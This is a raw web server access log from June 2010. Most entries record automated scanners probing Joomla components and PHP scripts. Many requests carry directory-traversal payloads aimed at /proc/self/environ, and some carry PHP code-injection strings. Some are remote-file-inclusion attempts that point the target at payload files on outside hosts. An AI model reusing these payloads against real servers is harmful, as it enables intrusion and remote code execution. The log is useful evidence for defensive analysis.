211.43.212.56 - - [12/Jun/2010:23:45:23 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:45:23 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:45:24 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
207.46.199.178 - - [12/Jun/2010:23:45:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [12/Jun/2010:23:50:03 -0500] "GET / HTTP/1.1" 200 1003 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.0.30 - - [12/Jun/2010:23:51:18 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [12/Jun/2010:23:51:18 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.0.30 - - [12/Jun/2010:23:51:46 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [12/Jun/2010:23:51:46 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
67.15.152.183 - - [12/Jun/2010:23:51:54 -0500] "GET /logs/index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [12/Jun/2010:23:51:54 -0500] "GET /index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
65.162.17.11 - - [12/Jun/2010:23:52:35 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:52:36 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.238.145.196 - - [12/Jun/2010:23:52:57 -0500] "GET /logs/index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
89.238.145.196 - - [12/Jun/2010:23:52:58 -0500] "GET /index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
65.162.17.11 - - [12/Jun/2010:23:53:57 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:53:57 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:53:57 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:53:57 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
65.162.17.11 - - [12/Jun/2010:23:54:03 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:54:03 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:54:03 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:54:04 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:54:09 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
64.34.165.224 - - [12/Jun/2010:23:54:20 -0500] "GET /logs/index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.34.165.224 - - [12/Jun/2010:23:54:21 -0500] "GET /index.php?option=reflect_base&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.162.17.11 - - [12/Jun/2010:23:54:30 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:54:30 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:55:38 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:55:46 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:55:51 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
65.162.17.11 - - [12/Jun/2010:23:55:53 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:55:54 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:55:54 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:56:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:03 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:04 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:09 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:09 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:10 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:10 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:12 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:56:13 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.822"
65.162.17.11 - - [12/Jun/2010:23:56:27 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:56:28 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [12/Jun/2010:23:56:28 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.43.212.56 - - [12/Jun/2010:23:57:14 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:15 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:15 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:23 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:24 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [12/Jun/2010:23:57:25 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
67.223.230.123 - - [12/Jun/2010:23:57:53 -0500] "GET /logs/access_log.1274572800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
88.191.94.188 - - [12/Jun/2010:23:57:56 -0500] "GET /logs/access_log.1274313600/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.94.188 - - [12/Jun/2010:23:58:40 -0500] "GET /logs/access_log.1274313600/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.21.79.214 - - [12/Jun/2010:23:59:08 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.15.152.183 - - [12/Jun/2010:23:59:50 -0500] "GET /logs/index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [12/Jun/2010:23:59:50 -0500] "GET /index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
81.21.79.214 - - [13/Jun/2010:00:00:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [13/Jun/2010:00:00:43 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [13/Jun/2010:00:00:43 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
219.240.36.36 - - [13/Jun/2010:00:01:30 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
89.238.145.196 - - [13/Jun/2010:00:01:50 -0500] "GET /logs/index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
89.238.145.196 - - [13/Jun/2010:00:01:50 -0500] "GET /index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
209.160.32.228 - - [13/Jun/2010:00:02:55 -0500] "GET /logs//localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:00:02:55 -0500] "GET //localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.160.32.228 - - [13/Jun/2010:00:02:55 -0500] "GET /logs/access_log.1272067200//localhost/[path]/pda/pda_projects.php?offset=http://97.74.238.165/ic/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.162.17.11 - - [13/Jun/2010:00:03:14 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:03:17 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.223.230.123 - - [13/Jun/2010:00:03:19 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.223.230.123 - - [13/Jun/2010:00:03:19 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.223.230.123 - - [13/Jun/2010:00:03:20 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
62.219.199.50 - - [13/Jun/2010:00:03:23 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.219.199.50 - - [13/Jun/2010:00:03:24 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:03:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:03:59 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:04:00 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [13/Jun/2010:00:04:04 -0500] "GET /logs/access_log.1178668800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.162.17.11 - - [13/Jun/2010:00:04:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:04:08 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.162.17.11 - - [13/Jun/2010:00:04:08 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.223.230.123 - - [13/Jun/2010:00:04:14 -0500] "GET /logs/access_log.1274572800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
211.43.212.56 - - [13/Jun/2010:00:04:18 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:04:21 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:04:26 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
62.219.199.50 - - [13/Jun/2010:00:05:20 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.219.199.50 - - [13/Jun/2010:00:06:06 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.219.199.50 - - [13/Jun/2010:00:06:06 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.219.199.50 - - [13/Jun/2010:00:06:07 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.212.56 - - [13/Jun/2010:00:06:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:25 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:26 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:33 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:34 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:34 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:37 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:38 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [13/Jun/2010:00:06:39 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
219.240.36.36 - - [13/Jun/2010:00:06:40 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
89.110.131.43 - - [13/Jun/2010:00:07:10 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
89.110.131.43 - - [13/Jun/2010:00:07:10 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
89.110.131.43 - - [13/Jun/2010:00:07:11 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
119.63.193.56 - - [13/Jun/2010:00:08:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
81.21.79.214 - - [13/Jun/2010:00:09:01 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [13/Jun/2010:00:09:01 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [13/Jun/2010:00:09:01 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.13.134 - - [13/Jun/2010:00:09:06 -0500] "GET /logs/access_log.1262131200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [13/Jun/2010:00:09:48 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
207.46.13.101 - - [13/Jun/2010:00:14:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.101 - - [13/Jun/2010:00:14:06 -0500] "GET /logs/access_log.1248134400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [13/Jun/2010:00:15:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
72.47.211.173 - - [13/Jun/2010:00:16:17 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
72.47.211.173 - - [13/Jun/2010:00:16:22 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.79"
72.47.211.173 - - [13/Jun/2010:00:16:22 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
76.73.68.58 - - [13/Jun/2010:00:20:04 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
69.175.66.250 - - [13/Jun/2010:00:20:52 -0500] "GET /logs/access_log.1274572800%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.175.66.250 - - [13/Jun/2010:00:20:52 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.66.250 - - [13/Jun/2010:00:20:52 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.66.250 - - [13/Jun/2010:00:21:00 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.66.250 - - [13/Jun/2010:00:21:00 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.175.66.250 - - [13/Jun/2010:00:21:00 -0500] "GET /logs/access_log.1274572800%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
72.47.211.173 - - [13/Jun/2010:00:21:40 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.79"
72.47.211.173 - - [13/Jun/2010:00:21:41 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
72.47.211.173 - - [13/Jun/2010:00:21:41 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.79"
219.240.36.36 - - [13/Jun/2010:00:22:12 -0500] "GET /logs/access_log.1274572800/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:00:22:13 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:00:22:13 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
76.73.68.58 - - [13/Jun/2010:00:23:58 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
64.32.22.130 - - [13/Jun/2010:00:28:19 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
64.32.22.130 - - [13/Jun/2010:00:28:20 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
64.32.22.130 - - [13/Jun/2010:00:28:20 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
